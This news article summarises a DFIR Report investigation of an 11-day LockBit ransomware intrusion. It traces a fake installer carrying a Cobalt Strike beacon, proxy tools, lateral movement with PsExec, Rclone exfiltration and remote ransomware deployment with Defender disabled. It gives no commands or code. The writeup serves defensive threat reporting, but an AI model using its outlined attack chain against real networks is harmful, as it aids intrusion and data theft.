Threat actors demonstrated a methodical approach in a recent cyberattack, taking 11 days from initial compromise to fully deploy LockBit ransomware across a victim’s network.
The incident, detailed in a report by The DFIR Report, showcases the evolving tactics of ransomware operators and the critical need for robust cybersecurity measures.
The attack began in late January 2024 when an unsuspecting user downloaded and executed a file named “setup_wm.exe” from a malicious website.
This executable, masquerading as a legitimate Windows Media Configuration Utility, was actually a Cobalt Strike beacon.
.webp)
Within 30 minutes of execution, the beacon initiated discovery commands, starting with nltest to identify domain controllers.
Security analysts at The Fire Report noted that leveraging elevated permissions of the compromised user, the attackers deployed two proxy tools – SystemBC and GhostSOCKS – onto a domain controller using SMB and remote services.
While Windows Defender detected and blocked GhostSOCKS, the SystemBC proxy remained active, establishing a command and control channel.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
Initial Access
The threat actors then employed a variety of tools and techniques to expand their foothold.
They used PsExec and PowerShell for lateral movement, deployed additional Cobalt Strike beacons, and utilized tools like Seatbelt and SharpView for network reconnaissance. Persistence was established through scheduled tasks and registry modifications.
A critical phase of the attack involved data exfiltration. The attackers used Internet Explorer to access temporary file-sharing sites and later employed Rclone for large-scale data theft.
.webp)
Initial attempts to exfiltrate via FTP failed, but subsequent efforts using Mega.io and a different FTP server were successful, resulting in several gigabytes of data being stolen over a 16-hour period.
On the eleventh day, the attackers shifted focus to ransomware deployment. They used the backup server as a staging ground, dropping multiple batch scripts to automate the process.
.webp)
The LockBit ransomware binary, named “ds.exe,” was distributed across remote hosts using tools like PsExec and BITSAdmin. The threat actors executed the ransomware remotely via both WMI and PsExec.
To facilitate the attack, additional scripts were deployed to disable Windows Defender and modify RDP settings across the network.
.webp)
The ransomware was successfully propagated to all Windows hosts within the environment, achieving a Time to Ransomware (TTR) of just under 239 hours.
Organizations must remain vigilant and proactive in their cybersecurity efforts to defend against such lengthy and planned attacks.
Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar
